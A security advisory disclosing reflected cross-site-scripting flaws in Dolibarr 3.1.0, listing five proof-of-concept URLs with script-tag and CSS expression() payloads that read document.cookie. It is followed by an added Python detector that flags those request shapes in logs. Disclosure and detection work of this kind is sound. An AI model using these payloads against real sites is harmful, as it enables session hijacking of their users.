Nov 10: INFOSERVE-ADV2011-03 - Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory ID: INFOSERVE-ADV2011-03
Author: Stefan Schurtz
Contact:
Affected Software: Successfully tested on Dolibarr 3.1.0; other versions may also be affected
Vendor URL:
Vendor Status: fixed in the 3.1 branch

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>&=3&optioncss=print
http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))
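
A check for the two request shapes listed above (markup in a query parameter, and markup appended as extra path segments after a .php script name), written as an added example that is not part of the original advisory. The function names and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qsl

# Characters that can break out of an HTML attribute or tag context.
MARKUP_CHARS = re.compile(r'[<>"\']')
# CSS expression(), allowing a /**/ comment to split the keyword as in the advisory.
CSS_EXPRESSION = re.compile(r'expre(?:/\*.*?\*/)?ssion\s*\(', re.I)
# A .php script name followed by extra path segments (PATH_INFO).
PHP_PATH_INFO = re.compile(r'^(?P<script>.*?\.php)(?P<extra>/.*)$', re.I)
SCRIPT_TAG = re.compile(r'<\s*/?\s*script', re.I)


def flag_request(target):
    """Return the reasons a request target matches the advisory's patterns."""
    reasons = []
    parts = urlsplit(target)

    # Shape 2: /admin/<page>.php/<markup> reflected from the request path.
    match = PHP_PATH_INFO.match(unquote(parts.path))
    if match:
        extra = match.group('extra')
        if MARKUP_CHARS.search(extra):
            reasons.append('markup characters in PATH_INFO after ' + match.group('script'))
        if CSS_EXPRESSION.search(extra):
            reasons.append('CSS expression() in PATH_INFO')

    # Shape 1: a script tag inside a decoded query parameter value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SCRIPT_TAG.search(value):
            reasons.append('script tag in parameter ' + repr(name))
    return reasons


# Constructed request targets, percent-encoded as they would appear in an access log.
SAMPLE_TARGETS = [
    '/admin/company.php?mainmenu=home&leftmenu=setup'
    '&username=%27%22%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E',
    '/admin/security_other.php/%22%20stYle=%22x:expre/**/ssion(alert(document.cookie))',
    '/admin/company.php?mainmenu=home&leftmenu=setup',   # benign
    '/index.php/some/path',                              # benign PATH_INFO
]


def scan(targets):
    """Map each flagged target to its reasons; clean targets are omitted."""
    return {t: r for t in targets if (r := flag_request(t))}
```
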